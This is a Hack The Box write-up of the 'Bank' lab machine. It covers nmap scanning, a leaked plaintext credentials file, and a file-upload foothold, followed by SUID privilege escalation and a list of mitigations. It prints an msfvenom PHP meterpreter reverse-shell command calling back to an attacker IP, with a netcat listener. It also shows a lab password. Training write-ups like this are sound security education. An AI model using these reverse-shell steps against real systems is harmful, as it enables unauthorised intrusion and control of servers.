Hack The Box - Bank Writeup


Bank is an easy difficulty Linux box. The IP address is 10.10.10.29

First Steps

The first step as with most other boxes is to run nmap on the box.

Nmap

nmap -sC -sV -oA nmap/nmap 10.10.10.29

The flags used here are

-sc runs nmap using default scripts

-sv Does a version scan.

-oa nmap/nmap Saves the scan output in a folder named nmap

Output

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port Service
22 SSH
53 DNS
80 HTTP

DNS

Looking at the HTTP port first shows an Apache web server start page. Given the box is running a DNS server. It’s safe to assume there must be some virtual hosts. To enable a connection to this box a DNS entry must be added to our local hosts file.

/etc/hosts

echo "10.10.10.29 bank.htb" | sudo tee -a /etc/host

HTTP

Navigating to http://bank.htb opens up to a login page. There’s no obvious method to exploit the login form so there must be some other method of entry.

dirbuster

Running a dirbuster scan to find directories and files on the server revealed a directory named balance-transfer. Within this folder there are several files ending in .acc which contain plaintext encrypted bank account credentials with no obvious hash to decrypt.

Sifting through the files leads to one file which is significantly smaller than the others in the directory.

http://bank.htb/balance-transfer/68576f20e9732f1b2edc4df5b8533230.acc

--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===

The encryption failed for this particular transaction which leaves valid login credentials exposed.

Logging in

Using the credentials we are able to login to the customers bank account. The authorised page shows typical banking transaction and account details. Only two page links exist. Support and Logout.

The support page shows a support ticket system for users to submit questions to the bank. The form supports a user file upload.

Viewing the source code of this page reveals the method of gaining entry to the system.

PHP Reverse Shell

To gain access to the system we need to create a PHP revers shell. There are several scripts available for use in kali Linux. MSF Venom can be used to make a quick payload file if no scripts are available.

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.14.17 LPORT=4455 -f raw > shell.htb

After uploading the file to the support page we need to open a listener to establish the connection by using a netcat listener on our attack machine with nc -nvlp 4455. Once the listener is running, navigating to the uploaded file in a browser http://bank.htb/uploads/shell.htb will enable a remote shell on the system as the www-data user.

Traversing the file system reveals that the www-data user has access to the home directory of the user chris where the user.txt file can be located.

Privilege Escalation

Running LinEnum.sh on the server revelealed a file with an SUID bit.

Running this file reveals a script designed to give root privileges to the curret user for “emergency” reasons.

Root

A root shell is immediately granted running the emergency script and the root.txt file is in the root folder.

Mitigation

There are several steps that could have been taken to mitigate the security flaws on this system.

  • Account details should be moved to a location on the server not accessible by the web server.
  • Turning off Directory listings in the Apache web server would prevent the files from being browsed.
  • Ensuring that data cannot be processed without valid encryption.
  • Removing Debug information from customer facing websites.
  • Not allowing users the ability upload files that can execute server side code.
  • Disabling PHP execute, passthru and shell functions.
  • The Apache web server should run as its own user with no access to other system users files or data.
  • Having a script that enables root login to be accessible by users without permission should be avoided.